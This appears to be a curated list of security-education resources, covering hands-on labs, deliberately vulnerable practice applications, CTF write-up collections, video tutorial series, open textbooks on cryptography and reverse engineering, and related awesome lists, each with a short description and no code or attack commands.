People learn from mistakes. In security education, we study mistakes that lead to software vulnerabilities. Studying mistakes from the past not only helps students understand why systems are vulnerable, why a "seemingly benign" mistake can turn into a disaster, and why many security mechanisms are needed. More importantly, it also helps students learn the common patterns of vulnerabilities, so they can avoid making similar mistakes in the future. Moreover, using vulnerabilities as case studies, students can learn the principles of secure design, secure programming, and security testing.

  • Software Security Labs
    These labs cover some of the most common vulnerabilities in general software. The labs show students how attacks work in exploiting these vulnerabilities.

  • Network Security Labs
    These labs cover topics on network security, ranging from attacks on TCP/IP and DNS to various network security technologies (Firewall, VPN, and IPSec).

  • Web Security Labs
    These labs cover some of the most common vulnerabilities in web applications. The labs show students how attacks work in exploiting these vulnerabilities.

  • System Security Labs
    These labs cover the security mechanisms in operating systems, mostly focusing on access control mechanisms in Linux.

  • Cryptography Labs
    These labs cover three essential concepts in cryptography: secret-key encryption, one-way hash functions, and public-key encryption and PKI.

  • All SEED Laboratories

Dr. Thorsten Schneider's Binary Auditing

Learn the fundamentals of Binary Auditing. Know how HLL mapping works and gain a deeper understanding of file internals than ever. Learn how to find and analyse software vulnerabilities. Dig inside Buffer Overflows and learn how exploits can be prevented. Start to analyse your first viruses and malware the safe way. Learn about simple tricks and what viruses look like using real-life examples.

NOWASP (Mutillidae)

OWASP Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web-security enthusiasts. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMPP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2, and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulns and hints to help the user, this is an easy-to-use web hacking environment designed for labs, security enthusiasts, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.

Audi-1's SQLi-LABS

SQLi-LABS is a comprehensive test bed to learn and understand the nitty-gritty of SQL injection, and thereby helps professionals understand how to protect against it.

Capture the Flag

Vulnhub

We all learn in different ways: in a group, by yourself, reading books, watching/listening to other people, making notes or trying things out for yourself. Learning the basics and understanding them is essential; this knowledge can then be reinforced by putting it into practice.

Over the years people have been creating these resources and a lot of time has been put into them, creating 'hidden gems' of training material. However, unless you know of them, it's hard to discover them.

So VulnHub was born to cover as many as possible, creating a catalogue of 'stuff' that is (legally) 'breakable, hackable & exploitable', allowing you to learn in a safe environment and practise on it. When something is added to VulnHub's database it will be indexed as best as possible, to try and give you the best match possible for what you're wishing to learn or experiment with.

CTF Write Ups

  • CTF Resources
    A general collection of information, tools, and tips regarding CTFs and similar security competitions.

  • CTF write-ups 2015
    Wiki-like CTF write-ups repository, maintained by the community. (2015)

  • CTF write-ups 2014
    Wiki-like CTF write-ups repository, maintained by the community. (2014)

  • CTF write-ups 2013
    Wiki-like CTF write-ups repository, maintained by the community. (2013)

SecurityTube Playlists

SecurityTube hosts a large range of video tutorials on IT security, including penetration testing, exploit development and reverse engineering.

  • SecurityTube Metasploit Framework Expert (SMFE)
    This video series covers the basics of the Metasploit Framework. We will look at why to use Metasploit, then go on to how to exploit vulnerabilities with the help of Metasploit and post-exploitation techniques with Meterpreter.

  • Wireless LAN Security and Penetration Testing Megaprimer
    This video series will take you through a journey in wireless LAN (in)security and penetration testing. We will start from the very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications.

  • Exploit Research Megaprimer
    In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software.

  • Buffer Overflow Exploitation Megaprimer for Linux
    In this video series, we will understand the basics of buffer overflows and how to exploit them on Linux-based systems. In later videos, we will also look at how to apply the same principles to Windows and other selected operating systems.

Open Security Books

Crypto 101 - lvh

Comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms. Learn how to exploit common cryptographic flaws, armed with nothing but a little time and your favorite programming language. Forge administrator cookies, recover passwords, and even backdoor your own random number generator.

A Graduate Course in Applied Cryptography - Dan Boneh & Victor Shoup

This book is about constructing practical cryptosystems for which we can argue security under plausible assumptions. The book covers many constructions for different tasks in cryptography. For each task we define the required goal. To analyze the constructions, we develop a unified framework for doing cryptographic proofs. A reader who masters this framework will be capable of applying it to new constructions that may not be covered in this book. We describe common mistakes to avoid as well as attacks on real-world systems that illustrate the importance of rigor in cryptography. We end every chapter with a fun application that applies the ideas in the chapter in some unexpected way.

Reverse Engineering for Beginners - Dennis Yurichev

This book offers a primer on reverse-engineering, delving into disassembly code-level reverse engineering and explaining how to decipher assembly language for those beginners who would like to learn to understand x86 (which accounts for almost all executable software in the world) and ARM code created by C/C++ compilers.

CTF Field Guide - Trail of Bits

The focus areas that CTF competitions tend to measure are vulnerability discovery, exploit creation, toolkit creation, and operational tradecraft. Whether you want to succeed at CTF, or as a computer security professional, you'll need to become an expert in at least one of these disciplines. Ideally in all of them.

Documentation

OWASP - Open Web Application Security Project

The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.

Applied Crypto Hardening - bettercrypto.org

This guide arose out of the need for system administrators to have an updated, solid, well-researched and thought-through guide for configuring SSL, PGP, SSH and other cryptographic tools in the post-Snowden age. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings. This guide is specifically written for these system administrators.

Related Awesome Lists

  • Awesome Pentest
    A collection of awesome penetration testing resources, tools and other shiny things.

  • Awesome Appsec
    A curated list of resources for learning about application security.

  • Awesome Malware Analysis
    A curated list of awesome malware analysis tools and resources.

  • Android Security Awesome
    A collection of android security related resources.

  • Awesome CTF
    A curated list of CTF frameworks, libraries, resources and software.

  • Awesome Security
    A collection of awesome software, libraries, documents, books, resources and cool stuff about security.

  • Awesome Honeypots
    A curated list of awesome honeypots, tools, components and much more.

  • Awesome PCAP Tools
    A collection of tools developed by other researchers in the Computer Science area to process network traces.

  • Awesome Android Security
    A collection of android security related resources.

  • Awesome Hacking
    A curated list of awesome Hacking tutorials, tools and resources.

Contributing

Pull requests and issues with suggestions are welcome!

License

This work is licensed under a Creative Commons Attribution 4.0 International License.